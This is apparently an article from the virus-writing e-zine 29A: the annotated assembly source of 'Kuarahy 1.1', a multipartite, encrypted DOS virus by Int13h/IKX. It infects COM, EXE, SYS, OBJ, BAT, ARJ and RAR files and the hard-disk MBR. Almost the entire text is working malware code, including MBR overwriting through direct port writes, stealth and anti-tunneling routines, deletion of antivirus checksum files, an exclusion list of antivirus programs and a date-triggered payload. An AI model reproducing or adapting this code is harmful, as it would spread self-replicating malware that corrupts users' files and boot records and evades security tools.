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29A Issue 03 05 04
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³ Multipartite COM/EXE/OVL/SYS/OBJ/BAT/ARJ/RAR/BS/MBR encrypted fast infector ³
³ 10 different targets ³
V ßßßÛ ÜÛß Û Û ÜßßßßÜ ßÛßßßßÜ ÜßßßßÜ Û Û Û Û
I Û ÜÛ Û Û Û Û Û Û Û Û Û Û ßÛ Ûß
S Û ÛÜÜ ÛÜÜÜÜß Û Û Û ßÛ Û Û Û Û Û Version 1.1
³ Programmed by Int13h of IKX Virus Group ( ³
³ Made in Paraguay - South America ³
In this upgraded version I added infection of RAR type of files, it
drops itself in an encrypted form over ARJ and RAR archives in rnd files.
Tunnels by PSP tracing. Anti-tunneling.BS/MBR stealth on reads. Two ways
of hooking Int 21h. Doesn't infects some lame programs. Protects Int 21h
in AX=2521h and AX=3521h. Uses SFT. Doesn't infects philes inmunized
with CPAV & EXEs with overlays. Deletes AV checksum philes. Infects MBR
by direct writing to HD ports. A cool payload activates on days 13.
It consists in a change of the default text mode character set.
Formats an extra track in floppies. It doesn't have a poly engine, but a
routine to change pointer, keyword and operation in the main decryptor.
The MBR can be infected from all the infected hostes. Does other stuph.
> > > Greetz to IKX members and to all my IRC-friends < < <
; Compile under Turbo Assembler 4.0 and Turbo Link 6.10 from Borland Intl.
.model tiny
jumps ; Lazyness r0x0r
org 0h
Longitud = (offset FakeHoste-offset Kuarahy)
Largor = (offset Omega-Offset Kuarahy)
HeaderSize = (EndRARHeader-RARHeader)
ParraVir1 = ((Longitud+15)/16)+1
ParraVir2 = ((Longitud+15)/16)
VirusEnPara = (Largor+15)/16
org 03eh
db 0beh ; mov si...
Pointer:dw offset Encriptado+07c00h
mov cx,0d8h
db 02eh
db 081h,034h ; xor word ptr [si],...
ClaveB dw 0
inc si
inc si
Marca: loop Descifra
cmp word ptr ds:[0],020cdh ; Check 4 PSP
jne Desde_Boot_o_MBR ; looking the INT 20h at field 0
jmp Desde_un_Phile ; Execution from a file
Desde_Boot_o_MBR: ; Execution from MBR or BS
sub ax,ax
mov ss,ax ; Set SS:SP
mov sp,07c00h
push ss
pop ds
int 12h
sub ax,12 ; Eat 12kb!
mov ds:[0413h],ax
mov cl,6
shl ax,cl
mov es,ax ; ES is our new house at TOM
mov si,07c00h
xor di,di
mov cx,256
repe movsw ; Move virus first part at TOM
mov ax,0209h ; Read the other sectors where the
mov bx,offset ParteII ; virus body is stored
cmp byte ptr es:[DondeEstamos],'F'
je FDisk ; Check if we are in a FD or HD
mov cx,0003h ; Track 0, Sector 3
mov dx,0080h ; Head 0
jmp short Uplodearse
FDisk: mov cx,5002h ; Track 80, Sector 2
sub dx,dx ; Head 0, drive A:
int 13h
mov ax,0209h
int 13h
jc Vamonos
push es
mov bx,offset Arriba
push bx
retf ; Jump to our segment!
DondeEstamos db 'F'
Revisar db 'S'
Cuenta db 0
ARRiBa: mov ax,32d
call Desde_un_Phile ; Decrypt encrypted virus body
mov byte ptr cs:[Cuenta],0 ; Initialize vars
mov byte ptr es:[Revisar],'S'
mov byte ptr es:[Bandera],'N'
mov ax,word ptr ds:[13h*4] ; Hook the kewlest int :)
mov word ptr es:[Offset_de_la_13h],ax
mov word ptr ds:[13h*4],offset Nueva13Handler
mov ax,word ptr ds:[(13h*4)+2]
mov word ptr es:[Segmento_de_la_13h],ax
mov word ptr ds:[(13h*4)+2],es
mov ax,0201h ; Read MBR
mov bx,offset MBRBS
mov cx,0001h
mov dx,0080h
call dword ptr cs:[Offset_de_la_13h]
jc Vamonos ; Grrr!
cmp word ptr es:[bx+offset Marca],0f7e2h
je Vamonos ; Infected?
mov byte ptr es:[DondeEstamos],'H'
push ds
push es
pop ds
xor di,di
mov ax,0301h ; Write original MBR
mov bx,offset MBRBS
mov cx,0002h ; Track 0, Sector 2
mov dx,0080h ; Head 0
int 13h
mov byte ptr cs:[QueEs],'b'
push di ds es
mov bp,020fh ; Generate an encrypted copy
call Encriptor
pop es ds di
mov si,offset ParaOuting
mov bx,offset CopiaVirus ; Infect MBR via ports
call Direct_HD_Write_Using_Ports
mov ax,0309h ; Write the virus body to other sectors
mov bx,offset CopiaVirus+200h
mov cx,0003h
mov dx,0080h
int 13h
cmp di,32 ; Check our flaggy
jne StillWeGo
pop ds
mov byte ptr es:[DondeEstamos],'F'
cmp byte ptr es:[DondeEstamos],'F' ; FD or HD?
je Floppy
mov dx,0080h ; Head 0
mov cx,0002h ; Track 0, sector 2
jmp short CargarOriginal
Floppy: xor dx,dx ; Head 0, drive A:
mov cx,5001h ; Track 80, sector 1
push ds
pop es
mov bx,07c00h
mov ax,0201h ; Load original MBR or BS
int 13h
mov ax,0201h
int 13h
db 0eah ; Execute the sucker
dw 07c00h
dw 0
call kill_tunnel
cmp ax,0cd13h ; Are you there?
je Chequeo
cmp ah,03h ; Writing?
je Hookear_Int21h
cmp ah,02h ; Reading?
jne Normal
cmp cx,0001h ; Track 0, sector 1?
jne Normal
test dx,dx ; Head 0, drive A:?
je Infectar
cmp dx,0080h ; Head 0, hard disk?
je Stealth_MBR
Normal: db 0eah
Offset_de_la_13h dw 0
Segmento_de_la_13h dw 0
push cx
mov cl,02h ; Read original MBR in user's buffer
int 13h
pop cx
retf 2
push ax
push cx
push dx
mov ax,0201h
xor dx,dx
mov cx,5001h ; Read original BS in fool's buffer
call dword ptr cs:[Offset_de_la_13h]
mov ax,0201h
call dword ptr cs:[Offset_de_la_13h]
pop dx
pop cx
pop ax
retf 2
db " >KUARAHY< Koa ha'e Int13h/IKX rembiapoku hina! :) "
org 1feh
db 55h,0aah
org 200h ; First sector
ParteII label byte ; Second virus part follow
db 0beh ; mov si...
Puntero dw 020fh
mov cx,((Largor-200h)-0fh)/2
db 02eh
db 081h,034h ; xor word ptr [si],...
ClaveF dw 0
inc si
inc si
loop Decrypta
cmp ax,32
jne Getear_Delta
call Delta
Delta: pop bp
sub bp,offset Delta
cmp byte ptr cs:[bp+QueEs],'S'
je Strategy_Routine ; Is a .SYS hoste?
mov ax,0cd13h ; Are you there?
int 21h
cmp ax,013cdh
jne Instalar
jmp MemoriaYaPodrida ; Yes, I am
push es
mov ax,3521h ; Get INT 21h handler
int 21h
mov cs:[bp+word ptr Abuela21h],bx
mov cs:[bp+word ptr Abuela21h+2],es
mov cs:[bp+word ptr Real21h],bx
mov cs:[bp+word ptr Real21h+2],es
push ds
lds bx,ds:[0006h] ; Trace PSP. 10x SLH
Tracear:cmp byte ptr ds:[bx],0eah
jne Chekear
lds bx,ds:[bx+1]
cmp word ptr ds:[bx],9090h
jnz Tracear
sub bx,32h
cmp word ptr ds:[bx],9090h
jne Chekear
Hallado:mov cs:[bp+word ptr Real21h],bx
mov cs:[bp+word ptr Real21h+2],ds
jmp short MCBTSR
Chekear:cmp word ptr ds:[bx],2e1eh
add bx,25h
cmp word ptr ds:[bx],80fah
je Hallado
MCBTSR: pop ds
mov ax,0cd13h ; Is virus TSR from BS or MBR?
int 13h
cmp ax,013cdh
jne ModificarMCB ; No, then go and play with MCBs
push bx ; Yes it is, viral segment in BX
pop es ; We will hook INT 21h directly
push cs
pop ds
lea si,cs:[bp+word ptr Abuela21h]
mov di,offset Abuela21h ; Fill our variables
lea si,cs:[bp+word ptr Real21h]
mov di,offset Real21h
xor ax,ax
mov es,ax
mov di,21h*4 ; And hook the int
mov ax,offset Viral21Handler
mov ax,bx
pop es
jmp MemoriaYaPodrida
mov ax,ds ; TSR via MCB
dec ax
mov es,ax
mov ax,es:[3]
sub ax,ParraVir1
xchg bx,ax
push ds
pop es
mov ah,4ah ; Free unused mem
int 21h
mov ah,48h ; Allocate mem
mov bx,ParraVir2
int 21h
dec ax
mov es,ax
mov word ptr es:[1],8 ; DOS's
mov word ptr es:[8],'Ky' ; Block name: KY (Kuarahy)
inc ax
mov es,ax
xor di,di
push cs
pop ds
lea si,[bp+offset Kuarahy]
mov cx,Longitud
rep movsb ; Copy virus to our segment
mov byte ptr es:[Bandera],'N'
push es
pop ds
mov ax,2521h ; Hook the int
mov dx,offset Viral21Handler
int 21h
pop es
mov ax,0cafeh ; Call MBR infection service
int 21h
cmp byte ptr [bp+QueEs],'C'; COM?
je CorrerCOM
cmp byte ptr [bp+QueEs],'B'; BAT?
je CorrerBAT
cmp byte ptr [bp+QueEs],'O'; OBJ?
je CorrerOBJ
xor di,di
cmp byte ptr [bp+QueEs],'A' ; ARJ?
je CorrerARJ_RAR
cmp byte ptr [bp+QueEs],'R' ; RAR?
je CorrerARJ_RAR
; EXE/OVL file
mov ah,2ah ; Get date
int 21h
cmp dl,13d ; Day=13?
jne SigaNomas
mov di,32
push es bp
call CorrerARJ_RAR ; Change text fonts
pop bp es
xchg cx,ax
int 16h
push es
pop ds
mov bx,bp
mov ax,es
add ax,10h ; Acount 4 PSP
add cs:[(bx+CS_IP)+2],ax
add ax,cs:[(bx+SS_SP)+2]
mov ss,ax
mov sp,cs:[bx+SS_SP]
call Limpiar ; Clear regs
db 0ebh,0h ; Clear prefetch queue
db 0eah ; Restore control to .EXE
CS_IP dw offset FakeHoste,0h
SS_SP dw 0,0
CorrerCOM: ; COM file
call Segmentos
lea si,[bp+offset Vafer] ; Points to original bytes
mov di,100h
push di
movsb ; Restore them
Limpiar:xor ax,ax
sub bx,bx
xor cx,cx
sub dx,dx
xor si,si
sub di,di
xor bp,bp
ret ; Run COM or return to caller
CorrerBAT: ; BAT file
call segmentos
mov ax,word ptr ds:[2ch] ; Fill the table
mov word ptr [bp+FCB1],cs ; for 4bh execution
mov word ptr [bp+FCB2],cs
mov word ptr [bp+PSP],ax
mov word ptr [bp+SLINEA],cs
mov es,word ptr ds:[2ch] ; Environment segment
sub ax,ax
mov di,1
dec di
scasw ; Look 4 doble-zero
jnz Look4Zero
inc di ; Points to filename
inc di
push es
pop ds
push cs
pop es ; Copy filename to our buffer
mov si,di
lea di,[bp+offset RARHeader]
mov cx,128d
rep movsb
push cs cs
pop ds es ; CS=DS=ES
sub al,al ; Look for the 0 of the ASCIIZ string
lea di,[bp+offset RARHeader]
mov cx,125d
repne scasb
mov word ptr [di-4],'AB' ; Change extension to .BAT
mov byte ptr [di-2],'T'
mov si,80h ; Command line
dec di
mov cl,byte ptr ds:[80h] ; Quantity of characters
xor ch,ch
inc cl
mov si,81h
rep movsb
lea si,[bp+offset Linea] ; Move all to the command line in PSP
mov di,080h
cmp al,0dh ; ENTER? 0dh
je Termino
jmp OtraVez
sub di,81h
mov cx,di ; Calculate new lenght
mov byte ptr ds:[080h],cl ; Update offset 80h of PSP
mov sp,6000d ; Reajust stack
mov ah,4ah ; Free memory
mov bx,(Largor+4000)/16
int 21h
lea dx,[bp+offset RunMe]
mov ax,4b00h ; Execute the sucker
lea bx,[bp+offset PSP]
int 21h
mov ah,4dh ; Get exit code
int 21h ; ERRORLEVEL
mov ah,4ch ; And exit to DOS
int 21h
CorrerOBJ: ; OBJ file (COM when compiled)
call Segmentos
lea si,[bp+offset Copier] ; Point to our little code
mov di,64000 ; Copy it in the heap
mov ax,di
mov cx,5
rep movsw
lea si,[bp+offset Omega] ; Points to hoste
mov di,100h ; Destination offset
push di
mov cx,60000
xor bx,bx
xor dx,dx
jmp ax
Copier: repe movsb ; Move host at 100h, in memory
xor si,si
sub di,di
xor ax,ax
sub cx,cx
ret ; Give control to him
CorrerARJ_RAR: ; ARJ/RAR file
call Segmentos
mov ah,9 ; Copyright
lea dx,[bp+offset Copyright]
int 21h
mov cx,26d
lea si,[bp+offset Letras]
mov bp,si
mov dx,'A'
Cicling:push cx
mov ax,1100h
mov bx,0e00h ; Change text fonts
mov cx,01
int 10h
inc dx
add bp,14
pop cx
Loop Cicling
cmp di,32
jne SaleAlDos
SaleAlDOS: ; EXIT to DOS if ARJ/RAR, acting
int 20h ; like a shareware program :)
Viral21Handler: ; KUARAHY handler of INT 21h
call kill_tunnel
cmp ax,0cd13h ; Resident check
je Chequeo
cmp ax,0cafeh ; MBR sucking service
je InfectarMBR
cmp ah,04bh ; Execution
je Analizar
cmp ah,056h ; Rename
je Analizar
cmp ah,043h ; Get/Set attribs
je Analizar
cmp ah,3dh ; Open
je Analizar
cmp ax,6c00h ; Extended open
je Analizar
cmp ax,03521h ; Protect Int 21h
je Ocultar21h_A
cmp ax,02521h ; Protect Int 21h
je Ocultar21h_B
cmp ax,05700h ; Hide wrong seconds
je Stealth_Segundos1
cmp ax,05701h ; Protect wrong seconds
je Stealth_Segundos2
db 0eah ; Normal INT normal
Abuela21h dw 0,0
Ocultar21h_A: ; Give him the old handler
mov bx,cs:[word ptr Abuela21h]
mov es,cs:[word ptr Abuela21h+2]
Ocultar21h_B: ; Put him as the old handler
mov cs:[word ptr Abuela21h],dx
mov cs:[word ptr Abuela21h+2],ds
push dx
push cx
mov ax,5700h
call dword ptr cs:[Real21h]
and cl,00011111b
cmp cl,00011110b
jne Tranquilopa
pop cx
and cl,11100000b
or cl,00011110b ; Still marked as infected
push cx
pop cx
pop dx
mov ax,5701h
call dword ptr cs:[Real21h]
Stealth_Segundos1: ; Hide wrong seconds
call dword ptr cs:[Real21h]
push cx
and cl,00011111b
cmp cl,00011110b
jne NoPasaNada
pop cx
and cl,11100000b
or cl,1
push cx
pop cx
Manejador24h: ; Error handler
mov al,03
Analizar: ; Check DS:DX 4 victims
push ax bx cx dx si di bp ds es
cmp ax,6c00h
jne No_Apertura_Extendida
cmp dx,0001
jne JustPOPs
mov dx,si
push dx ds
mov ax,3524h ; 24h handler
int 21h
mov word ptr cs:[Vieja24h],bx
mov word ptr cs:[(Vieja24h)+2],es
push cs
pop ds
mov ax,2524h ; Hook it
mov dx,offset Manejador24h
int 21h
pop ds dx
mov word ptr cs:[Victima],dx
mov word ptr cs:[Victima+2],ds
mov bx,ds
push ds
pop es
mov di,dx
mov cx,128
mov al,'.' ; Search the .
repne scasb
jnz PopAll
mov ax,word ptr es:[di-3] ; Check name
or ax,02020h
cmp ax,'dn' ; commaND
je PopAll
cmp ax,'na' ; scAN / cleAN / tbscAN / tbcleAN
je PopAll
cmp ax,'va' ; tbAV / nAV
je PopAll
cmp ax,'to' ; fool-prOT
je PopAll
cmp ax,'dr' ; guaRD
je PopAll
cmp ax,'ur' ; findviRU
je PopAll
cmp ax,'ti' ; toolkIT
je PopAll
cmp ax,'pv' ; aVP
je PopAll
cmp ax,'ni' ; wIN
je PopAll
cmp ax,'pl' ; ifshLP
je PopAll
push cs
pop es
mov si,offset Cabecera
xchg si,di ; Check extension
call Segmentos
call Checar_Ext
jc PopAll
Abrir: mov ax,3d00h ; Open in read-only mode
call dword ptr cs:[Real21h]
jc PopAll
xchg bx,ax
push cs
pop ds
mov byte ptr ds:[DondeEstamos],'H'
push es bx
mov ax,1220h
int 2fh
mov ax,1216h
xor bh,bh
mov bl,es:[di]
int 2fh
mov cl,byte ptr es:[di+4] ; Manipulate SFT
mov byte ptr [AtribsFile],cl
mov byte ptr es:[di+4],20h
mov byte ptr es:[di+2],2
mov word ptr [SFT],di
mov word ptr [SFT+2],es
pop bx es
mov ax,4301h
mov dx,offset Basura1
sub cx,cx
call dword ptr cs:[Real21h]
mov ah,41h ; Delete AV checksum files
mov dx,offset Basura1
int 21h
mov ah,41h
mov dx,offset Basura2
int 21h
mov ah,41h
mov dx,offset Basura3
int 21h
mov ah,41h
mov dx,offset Basura4
int 21h
mov ax,5700h ; Get time/date
call dword ptr ds:[Real21h]
mov word ptr ds:[Time],cx
mov word ptr ds:[Date],dx
mov word ptr ds:[TimeDate+2],dx
and cl,00011111b
cmp cl,00011110b ; 30*2= ¨60?
jne Conti ; Infected?
jmp PopAll
Conti: mov ah,3fh ; Read 45 bytes
mov cx,45d
mov dx,offset Cabecera
int 21h
mov si,dx
mov ax,[si]
jmp SaltarAdondeCorresponda
InfectarCOM: ; .COM infection
push bx
mov ah,30h
int 21h
pop bx
cmp al,7 ; No activity if DOS >=7
jae Cerrar
call AlFinal
test dx,dx
jnz Cerrar
cmp ax,58000d ; Check size
ja Cerrar
cmp ax,666d
jbe Cerrar
cmp word ptr [si+11d],'TW' ; Sucked with CPAV?
je Cerrar
mov di,offset Vafer ; Take original bytes
sub ax,3
mov word ptr [Salto+1],ax
mov bp,ax
add bp,312h ; Encrypt virus
call Encriptor
mov cx,Largor
mov dx,offset CopiaVirus
mov ah,40h
int 21h ; Infect file with the encrypted copy
call AlInicio
mov ah,40h ; Put the JMP
mov cx,3
mov dx,offset Salto
int 21h
jmp SalteAqui
InfectarEXE: ; .EXE infection
cmp byte ptr [QueEs],'S'
je Cerrar
cmp word ptr [si+018h],0040h
jae Cerrar
cmp word ptr [si+01ah],0000
jne Cerrar ; Overlay?
cmp word ptr [si+43d],'TW' ; Sucked with CPAV's code?
je Cerrar
call AlFinal
mov cx,512d
div cx
or dx,dx
je NoHayResto
inc ax
cmp word ptr [si+02h],dx
jne Cerrar
cmp word ptr [si+04h],ax
jne Cerrar
call AlFinal ; EXE infection in the usual way
push bx
push dx ax ; Size to stack
les ax,dword ptr [(Cabecera+014h)]
mov [CS_IP],ax
mov [(CS_IP+2)],es
les ax,dword ptr [(Cabecera+0eh)]
mov word ptr [SS_SP],es
mov word ptr [(SS_SP+2)],ax
mov ax,word ptr [(Cabecera+08h)]
mov cl,4
shl ax,cl
xchg bx,ax
pop ax dx ; Size from stack
push ax dx
sub ax,bx
sbb dx,0
mov cx,10h
div cx
mov word ptr [(Cabecera+014h)],dx
mov bp,dx
mov word ptr [(Cabecera+016h)],ax
mov word ptr [(Cabecera+0eh)],ax
mov word ptr [(Cabecera+010h)],0
pop dx ax
add ax,Largor
adc dx,0
mov cl,9
push ax
shr ax,cl
ror dx,cl
or dx,dx
adc dx,ax
pop ax
and ah,1
mov word ptr [(Cabecera+4)],dx
mov word ptr [(Cabecera+2)],ax
mov ax,word ptr [(Cabecera+0ah)]
add ax,VirusEnPara
jc NoAgregarMemoria
mov word ptr [(Cabecera+0ah)],ax
mov word ptr [(Cabecera+0ch)],0ffffh
pop bx
add bp,20fh
call Encriptor
mov cx,Largor
mov ah,40h
mov dx,offset CopiaVirus
int 21h
call AlInicio
mov ah,40h ; Write new header
mov cx,01ah
mov dx,offset Cabecera
int 21h
call PongoFecha ; Restore time/date
call Reatributear ; & attributes
Cerrar: mov ah,3eh ; Close sucker
int 21h
PopAll: push cs
pop ds
mov ax,2524h
lds dx,dword ptr cs:[offset Vieja24h]
int 21h ; Restore Error Handler
pop es ds bp di si dx cx bx ax
jmp dword ptr cs:[Abuela21h]
InfectarSYS: ; .SYS infection
cmp byte ptr [QueEs],'S'
jne Cerrar
mov ax,word ptr [si+6] ; Strategy routine
mov word ptr [Vieja_Estrategica],ax
call AlFinal
mov word ptr [Cabecera+6],ax
; Point strategy routine to the second virus decryptor
add word ptr [Cabecera+6],offset Desde_un_Phile
mov bp,ax
add bp,20fh ; Encrypt the viruz
call Encriptor
mov cx,Largor
mov ah,40h
mov dx,offset CopiaVirus ; Write to the .SYS
int 21h
call AlInicio
mov ah,40h
mov cx,10 ; Write modified SYS header
mov dx,offset Cabecera
int 21h
jmp SalteAqui
Strategy_Routine: ; .SYS strategy routine
db 0b8h
Vieja_Estrategica dw 0
push ax bx cx dx si es ds ; Old strategy routine in the stack
push cs cs
pop ds es
mov ax,0cd13h ; Virus in memory?
int 13h
cmp ax,013cdh
je Checar_Payload ; If it is resident, then MBR=infected
mov ax,0201h ; Read MBR
lea bx,[bp+offset Omega]
mov cx,1
mov dx,0080h
int 13h
cmp word ptr es:[bx+offset Marca],0f7e2h
je Checar_Payload ; Infected?
mov ax,0301h ; Write MBR to sector 2
mov cx,2
int 13h
mov word ptr es:[bp+offset ClaveF],0
mov si,bp
push si
add si,offset Pointer ; Modify offset in the 1§ decryptor
mov word ptr [si],offset Encriptado+07c00h
pop bx
lea si,[bp+offset ParaOuting]
; Infect MBR using ports
call Direct_HD_Write_Using_Ports
mov ax,0309h ; Write virus body in contiguos sectors
lea bx,[bp+offset ParteII]
mov cx,0003h
mov dx,0080h
int 13h
mov ah,04 ; Get date
int 1ah
cmp dl,013h ; Day=13?
jne Popear
call Epsilon
Epsilon:pop bx
sub bx,offset Epsilon
lea si,[bx+offset Copyright]
mov cx,(offset Hehe-offset Copyright)-1
sub bx,bx
mov ah,0eh ; Print copyright
int 10h
loop Payload
xor ax,ax ; Pause
int 16h
Popear: pop ds es si dx cx bx
sub ax,ax
ret ; Jump to original strategy routine
InfectarOBJ: ; .OBJ infection
cmp byte ptr [QueEs],'O'
jne Cerrar
call AlInicio
xor di,di
call Lectura
cmp al,0a0h ; Kewlest field type ;)
jz ModificarValor
cmp al,0a2h
jz ModificarValor ; Look on OBJ infection tutorial
cmp al,8ah ; for more info
jz Ultimo
cmp al,8ch
jz Cerrar
mov ax,4201h ; Move pointer to the following
xor cx,cx ; field
int 21h
jnc OtroCampo
jmp Cerrar
push dx
mov ax,4201h
sub cx,cx
int 21h
push dx ax ; Save current pointer location
mov ah,3fh
mov cx,3 ; Read 3 bytes
mov dx,offset Entrada
int 21h
or di,di ; Checking flag
jnz NoEsElPrimerA0
inc di ; Modify flag state
; IP=100h?
cmp word ptr [Entrada+1],100h
je NoEsElPrimerA0
add sp,6 ; Correct stack pointer
jmp Cerrar
; Modify offset in memory, adding the virus size to it
add word ptr [Entrada+1],Largor
pop dx cx
push cx dx
mov ax,4200h ; Move pointer back
int 21h
mov ah,40h
mov dx,offset Entrada ; Write modified field
mov cx,3
int 21h
pop dx cx
mov ax,4200h ; Correct pointer position
int 21h
pop dx
jmp Punterear
Ultimo: mov cx,0ffffh ; Pointer to the last field (8a)
mov dx,0fffdh
mov ax,4201h
int 21h
mov cx,6
mov dx,offset VirusOBJRecord
mov ah,40h ; Write a field for our virus, with
int 21h ; IP=100h then when compiled we will
; have Virus+Hoste
mov bp,030fh
call Encriptor ; Generate an encrypted virus
mov ah,40h
mov cx,Largor
mov dx,offset CopiaVirus ; Write our encrypted code
int 21h
mov ah,40h
mov cx,10 ; Write the ending field
mov dx,offset Finalizacion
int 21h
jmp SalteAqui ; And dirty work is finished
; Let's the user start his compiler >:)
InfectarBAT: ; .BAT infection
call PongoFecha ; Mark BAT as infected
push es
call Reatributear ; Restore his attribs
pop es
mov ah,3eh ; And close it
int 21h
lds si,dword ptr cs:[Victima]
mov di,offset Filename ; Recover filename
mov dx,di
mov cx,128
cmp al,'.' ; Wait for the period
je Completa
stosb ; Copy to our buffer
Loop Followtheblind
stosb ; Store the .
push cs
pop ds
mov word ptr [di],'OC'
mov word ptr [di+2],004dh ; Adds .COM+0
mov ah,3ch ; Create that file
mov cx,20h
int 21h
jc PopAll
xchg bx,ax
push dx
mov bp,030fh ; Create encrypted virus copy
call Encriptor
mov cx,Largor
mov ah,40h ; And write that to the phile
mov dx,offset CopiaVirus
int 21h
mov ah,3eh ; Now close it
int 21h
pop dx
push dx
mov ax,03d02h ; Open it
call dword ptr cs:[Real21h]
xchg bx,ax
call PongoFecha ; Mark as infected
mov ah,3eh ; Close it
int 21h
pop dx
mov ax,4301h
mov cx,23h ; Set read-only+hidden attributes
call dword ptr cs:[Real21h]
jmp PopAll
cmp ax,06153h ; It was a "Ra"?
jne Cerrar
call Segmentos
mov di,offset RARname ; Points to the name
mov cx,4
call Changer ; Make a random name
mov bp,030fh ; Create encrypted virus copy
call Encriptor
mov ax,4202h
xor cx,cx ; Go to EOF
int 21h
mov si,offset CopiaVirus
mov cx,Largor
call CRC32 ; Get our CRC
mov word ptr [RARCRC32+2],dx
mov word ptr [RARCRC32],ax ; Save it in our RARheader
mov si,offset RARHeader+2 ; Make CRC of header
mov cx,HeaderSize-2
call CRC32
mov word ptr [RARHeaderCRC],ax
mov ah,40h
mov dx,offset RARHeader ; Write our header
mov cx,HeaderSize
int 21h
mov word ptr [RARHeaderCrc],0
mov word ptr [RARCrc32],0 ; Blank CRC values
mov word ptr [RARCrc32+2],0
mov dx,offset CopiaVirus
mov cx,Largor ; ADD the encrypted virus
mov ah,40h
int 21h
jmp SalteAqui
InfectarARJ: ; .ARJ infection. Thanks to
call Segmentos ; my kewl friend Star0/IKX!
mov di,offset Agregar ; Points to the name
mov cx,4
call Changer ; Get a random name
mov bp,030fh ; Create encrypted virus copy
call Encriptor
mov ax,4202h
xor cx,cx ; Go to EOF
int 21h
xchg cx,dx
mov dx,ax
sub dx,4
sbb cx,1
add cx,1
mov ax,4200h ; Move our pointer
int 21h
mov si,offset CopiaVirus
mov cx,Largor ; Calcule CRC of our code
call CRC32
mov word ptr [ArjCrc32],ax
mov word ptr [ArjCrc32+2],dx
mov ah,40h
mov cx,offset SecondSide-HeaderARJ
mov dx,offset HeaderARJ
int 21h
mov cx,ArjHeaderCrc-ArjHsmsize
mov si,offset ArjHsmSize
call CRC32
mov word ptr [ArjHeaderCrc],ax
mov word ptr [ArjHeaderCrc+2],dx
mov ah,40h
mov cx,EndSide-SecondSide
mov dx,offset SecondSide
int 21h
mov word ptr [ArjCrc32],0 ; Blank variables
mov word ptr [ArjCrc32+2],0
mov word ptr [ArjHeaderCrc],0
mov word ptr [ArjHeaderCrc+2],0
mov ah,40h
mov cx,Largor
mov dx,offset CopiaVirus ; Drop an encrypted virus copy
int 21h
mov word ptr [ArjHeadSiz],0
mov ah,40h
mov cx,4
mov dx,offset HeaderARJ
int 21h
jmp SalteAqui
Reatributear: ; Restore attribs using SFT
les di,dword ptr cs:[SFT]
mov cl,byte ptr cs:[AtribsFile]
mov byte ptr es:[di+4],cl
SaltarAdondeCorresponda: ; Check out what to infect
cmp ax,'ZM'
je InfectarEXE
cmp ax,'MZ' ; EXE
je InfectarEXE
cmp byte ptr [QueEs],'C' ; It is COM?
je InfectarCOM
cmp al,080h ; Begings with 80h? It is an OBJ
je InfectarOBJ
inc ax
jz InfectarSYS ; FFFF+1=0 then device driver?
cmp byte ptr [QueEs],'B' ; Is a batch one
je InfectarBAT
cmp byte ptr [QueEs],'A' ; ARJ file
je InfectarARJ
cmp byte ptr [QueEs],'R' ; RAR file
je InfectarRAR
jmp Cerrar
Changer: ; Generates random name for the
push cx ; file that we will add to the .ARJ
mov cx,25 ; RND between 0-25
call Get_RND
add ax,64 ; A-Z
pop cx
loop Changer
Contador dw 0 ; Infection counter
Copyright db 13,10,' [KUARAHY 1.1 by Int13h/IKX] - Written in Paraguay - Please register! ',13,10,'$'
Hehe db 'DOS Infection Machine',2
Bandera db 'N'
Salto db 0e9h,00h,00h ; 4 jmp construction
db ' Learn some guaran¡ words!:'
db 'Kuarahy=Sun A¤ =Devil Ku¤ =Woman '
Vafer db 090h,0cdh,020h ; Original COM bytes
Targets db 'execomsysobjbatovlarjrar'; Infectable extensions
QueEs db 'E' ; Hoste flag
Real21h dw 0,0 ; Original 21h handler
inc word ptr cs:[Contador] ; Update counter
mov ax,5701h
db 0b9h
Time dw 0 ; Restore date/time and mark as
and cl,11100000b ; an infected one
or cl,00011110b
db 0bah
Date dw 0
call dword ptr cs:[Real21h]
db ' E-mail me: '
AlInicio: ; For pointer movements
mov ax,04200h
jmp short Despl
AlFinal:mov ax,04202h
Despl: xor cx,cx
int 21h
Segmentos: ; DS:=CS & ES:=CS
push cs cs
pop ds es
Get_RND:push dx ; Random # Generator
push di
in ax,40h
mov dx,106
mul dx
add ax,1283
mov di,6075
adc dx,0
div di
mov ax,dx
mul cx
div di
pop di
pop dx
inc ax
Hookear_Int21h: ; Try to hook int 21h
cmp byte ptr cs:[Revisar],'S'
jne Retornemos ; Check the flag...
inc byte ptr cs:[Cuenta] ; Update our counter
cmp byte ptr cs:[Cuenta],8 ; 8 writes, we will hook Int 21h then
jbe Retornemos
push ds
push ax
push bx
xor ax,ax
mov ds,ax ; DS=IVT
mov ax,word ptr ds:[21h*4] ; Fill our vars
mov bx,word ptr ds:[(21h*4)+2]
mov word ptr cs:[Abuela21h],ax
mov word ptr cs:[Abuela21h+2],bx
mov word ptr cs:[Real21h],ax
mov word ptr cs:[Real21h+2],bx
cli ; Hook Int 21h
mov word ptr ds:[21h*4],offset Viral21Handler
mov word ptr ds:[(21h*4)+2],cs
mov byte ptr cs:[Cuenta],0 ; Clear counter
mov byte ptr cs:[Revisar],'N'
pop bx
pop ax
pop ds
jmp Normal ; Normal INT 13h
Encriptor: ; Virus's encryptor
call Segmentos
mov word ptr [Puntero],bp ; Pointer for 2§ decryptor
sub bp,01c2h ; Calculate the pointer for
mov word ptr [Pointer],bp ; 1§ decryptor
in al,40h
xchg ah,al
in al,40h ; Get keyword for 2§ decryptor
mov word ptr [ClaveF],ax
xor si,si
mov di,offset CopiaVirus
mov cx,Longitud ; Copy virus to buffer
rep movsb
mov si,offset CopiaVirus+020fh
mov ax,word ptr [ClaveF]
mov cx,((Largor-200h)-0fh)/2
xor word ptr [si],ax ; Encrypt Kuarahy
inc si
inc si
loop Proseguir
in al,40h
xchg ah,al
in al,40h ; Get keyword for 1§ decryptor
mov word ptr [ClaveB],ax
mov cx,300 ; Get a random operation XOR/SUB/ADD
call Get_RND
mov di,offset ClaveB-2
cmp ax,100
mov cl,1 ; XOR
mov ax,03481h
mov di,offset Rotar
mov ax,0431h
jmp Oima
SUBEAR: cmp ax,200
mov cl,2 ; SUB
mov ax,02c81h
mov di,offset Rotar
mov ax,0401h
jmp Oima
ADDEAR: mov cl,3 ; ADD
mov ax,00481h
mov di,offset Rotar
mov ax,0429h
Oima: xor ch,ch ; Choose new pointer
mov di,offset Pointer-1
push cx
mov cx,255
call Get_RND
pop cx
cmp al,80
ja UsarSI ; BX
mov al,0bbh
mov di,offset ClaveB+2
mov ax,04343h
mov di,offset ClaveB-1
mov si,offset TablaBX-1
add si,cx
jmp Oikoma
UsarSI: cmp al,160
ja UsarDI ; SI
mov al,0beh
mov di,offset ClaveB+2
mov ax,04646h
mov di,offset ClaveB-1
mov si,offset TablaSI-1
